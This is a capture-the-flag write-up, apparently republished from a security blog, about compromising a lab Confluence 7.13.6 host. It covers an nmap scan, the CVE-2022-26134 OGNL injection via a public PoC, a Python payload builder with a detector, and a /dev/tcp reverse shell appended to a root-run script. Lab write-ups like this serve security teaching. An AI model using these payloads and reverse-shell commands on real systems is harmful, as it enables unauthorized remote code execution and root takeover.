Information gathering:
root@iZt4nbifrvtk7cy11744y4Z:~# nmap -p- -Pn -A -sS -T4 192.168.216.41
Starting Nmap 7.80 ( https://nmap.org ) at 2025-02-26 15:40 CST
Nmap scan report for 192.168.216.41
Host is up (0.0029s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
8090/tcp open  opsmessaging?
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 302
|     Cache-Control: no-store
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     X-Confluence-Request-Time: 1740555626143
|     Set-Cookie: JSESSIONID=D518E2E9A0A5F7BFDA68A6A59D3D9A57; Path=/; HttpOnly
|     X-XSS-Protection: 1; mode=block
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: SAMEORIGIN
|     Content-Security-Policy: frame-ancestors 'self'
|     Location: http://localhost:8090/login.action?os_destination=%2Findex.action&permissionViolation=true
|     Content-Type: text/html;charset=UTF-8
|     Content-Length: 0
|     Date: Wed, 26 Feb 2025 07:40:26 GMT
|     Connection: close
|   HTTPOptions:
|     HTTP/1.1 200
|     MS-Author-Via: DAV
|     Content-Type: text/html;charset=UTF-8
|     Content-Length: 0
|     Date: Wed, 26 Feb 2025 07:40:26 GMT
|     Connection: close
|   RTSPRequest:
|     HTTP/1.1 400
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 1924
|     Date: Wed, 26 Feb 2025 07:40:26 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 – Bad Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 – Bad Request</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Invalid character found in the HTTP protocol [RTSP/1.00x0d0x0a0x0d0x0a...]</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request
|_    syntax, invalid
8091/tcp open  jamlink?
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 204 No Content
|     Server: Aleph/0.4.6
|     Date: Wed, 26 Feb 2025 07:41:01 GMT
|     Connection: Close
|   GetRequest:
|     HTTP/1.1 204 No Content
|     Server: Aleph/0.4.6
|     Date: Wed, 26 Feb 2025 07:40:31 GMT
|     Connection: Close
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     Access-Control-Allow-Origin: *
|     Access-Control-Max-Age: 31536000
|     Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST
|     Server: Aleph/0.4.6
|     Date: Wed, 26 Feb 2025 07:40:31 GMT
|     Connection: Close
|     content-length: 0
|   Help, Kerberos, LDAPSearchReq, LPDString, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
|     HTTP/1.1 414 Request-URI Too Long
|     text is empty (possibly HTTP/0.9)
|   RTSPRequest:
|     HTTP/1.1 200 OK
|     Access-Control-Allow-Origin: *
|     Access-Control-Max-Age: 31536000
|     Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST
|     Server: Aleph/0.4.6
|     Date: Wed, 26 Feb 2025 07:40:31 GMT
|     Connection: Keep-Alive
|     content-length: 0
|   SIPOptions:
|     HTTP/1.1 200 OK
|     Access-Control-Allow-Origin: *
|     Access-Control-Max-Age: 31536000
|     Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST
|     Server: Aleph/0.4.6
|     Date: Wed, 26 Feb 2025 07:41:06 GMT
|     Connection: Keep-Alive
|_    content-length: 0
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
(The raw SF-Port8090-TCP and SF-Port8091-TCP submission blocks are omitted here; they are the same responses shown above in escaped form.)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/26%OT=22%CT=1%CU=34851%PV=Y%DS=4%DC=T%G=Y%TM=67BEC5D
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST1
OS:1NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%
OS:RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 3306/tcp)
HOP RTT     ADDRESS
1   2.54 ms 192.168.45.1
2   2.54 ms 192.168.45.254
3   2.63 ms 192.168.251.1
4   2.85 ms 192.168.216.41

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 125.83 seconds
Ports 8090 and 8091 are open, but only the HTTP service on 8090 serves anything usable. The X-Confluence-Request-Time header and the redirect to /login.action on 8090 identify Confluence itself; 8091 answers 204 No Content with Server: Aleph/0.4.6, which is how Confluence's bundled Synchrony (collaborative editing) service presents itself, so there is no second web UI there.
The version string Atlassian Confluence 7.13.6 is printed at the bottom of the login page.
Searching for vulnerabilities in that version turns up CVE-2022-26134, an unauthenticated OGNL injection in Confluence Server and Data Center (the 7.13 branch was fixed in 7.13.7, so 7.13.6 is affected). A PoC was tried first, and the id command executed successfully.
Exploit used: https://github.com/XiaomingX/CVE-2022-26134-poc
With a listener already waiting on 192.168.45.184:3000 (for example nc -lvnp 3000), run:
python3 poc.py --rhost 192.168.216.41 --rport 8090 --lhost 192.168.45.184 --lport 3000 --protocol http:// --reverse-shell
This lands a reverse shell, and the local flag is collected.
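The following is an added example, not code from this write-up or from the referenced PoC repository. It builds the widely published OGNL payload for CVE-2022-26134 (the expression that runs a command and reflects its output in an X-Cmd-Response header, which is the mechanism most public PoCs use and is assumed here to be what the PoC above does), extracts that header from a raw response, and flags such requests in a web log so the defensive side is covered too. The helper names, the probe() target and the sample response are assumptions constructed for the example; only the OGNL expression is the public one.

```python
"""CVE-2022-26134 (Confluence OGNL injection): payload builder, response
parser and log check.  Added example; not the write-up's or the PoC's code.
The OGNL expression is the widely published one; the helper names and the
sample response below are constructed for this example."""
import http.client
import urllib.parse
from typing import Optional

# OGNL expression: run a command, read its stdout as a string and copy it
# into a response header so an unauthenticated client can read it back.
_OGNL_PREFIX = (
    '${(#a=@org.apache.commons.io.IOUtils@toString('
    '@java.lang.Runtime@getRuntime().exec("'
)
_OGNL_SUFFIX = (
    '").getInputStream(),"utf-8")).('
    '@com.opensymphony.webwork.ServletActionContext@getResponse()'
    '.setHeader("X-Cmd-Response",#a))}'
)
HEADER = "X-Cmd-Response"


def build_path(cmd: str) -> str:
    """Return the URL-encoded request path carrying the OGNL expression.

    The expression is evaluated from the URI path itself (that is the bug),
    so every byte is percent-encoded.  A double quote inside cmd would break
    the Java string literal, so it is rejected instead of silently mangled."""
    if '"' in cmd:
        raise ValueError("cmd must not contain a double quote")
    return "/" + urllib.parse.quote(_OGNL_PREFIX + cmd + _OGNL_SUFFIX, safe="") + "/"


def extract_cmd_response(raw_response: bytes) -> Optional[str]:
    """Pull the command output out of a raw HTTP response (e.g. one saved
    from a proxy).  None means the header is absent, i.e. the target did not
    evaluate the expression and is most likely patched."""
    head = raw_response.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n")[1:]:          # skip the status line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == HEADER.lower().encode():
            return value.strip().decode("utf-8", "replace")
    return None


def probe(host: str, port: int, cmd: str = "id", timeout: float = 5.0) -> Optional[str]:
    """Send the request over plain HTTP and return the reflected output.
    This is a live network call: only point it at a host you are authorised
    to test (hypothetical target, not executed by the sample below)."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", build_path(cmd))
        return conn.getresponse().getheader(HEADER)
    finally:
        conn.close()


def is_ognl_probe(path: str) -> bool:
    """Detection side: a request path that decodes to something containing
    '${' is an OGNL injection attempt.  Decoded twice so a double-encoded
    %2524%257B is caught as well."""
    decoded = urllib.parse.unquote(urllib.parse.unquote(path))
    return "${" in decoded


# Constructed sample response, modelled on the 302 the scan above returned,
# with the reflected header a vulnerable 7.13.6 instance would add.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 302 \r\n"
    b"X-Cmd-Response: uid=1001(confluence) gid=1001(confluence) groups=1001(confluence)\r\n"
    b"Location: http://localhost:8090/login.action?os_destination=%2Findex.action\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    print(build_path("id"))
    print(extract_cmd_response(SAMPLE_RESPONSE))
    print(is_ognl_probe(build_path("id")))
```

probe() is the only function that touches the network; everything else runs offline against the constructed response, which is what makes the header check reusable for verifying a patch (a fixed instance returns the normal 302 without X-Cmd-Response) and for screening access logs.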
Post-exploitation enumeration shows that root runs a script, /opt/log-backup.sh.
The script is owned by the user we currently have a shell as, so it can be edited.
Modify the script contents by appending a reverse shell:
echo "sh -i >& /dev/tcp/192.168.45.184/8001 0>&1" >> /opt/log-backup.sh
Note that the >& and /dev/tcp redirections in that line are handled by whichever shell interprets the script, not by the sh -i it launches; this only works if the script's shebang is bash (on Ubuntu /bin/sh is dash, which has no /dev/tcp), so check the first line before relying on it. Listen on port 8001 (for example nc -lvnp 8001), wait for root's next run of the script, and the root shell arrives.
The proof flag is collected.
Originally published on the WeChat public account EuSRC安全实验室: PG_Flu
Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear all legal and joint liability; this site assumes no legal or joint liability. For any issues, contact us by email (use a corporate or otherwise valid mailbox so the message is not blocked; contact details are on the home page).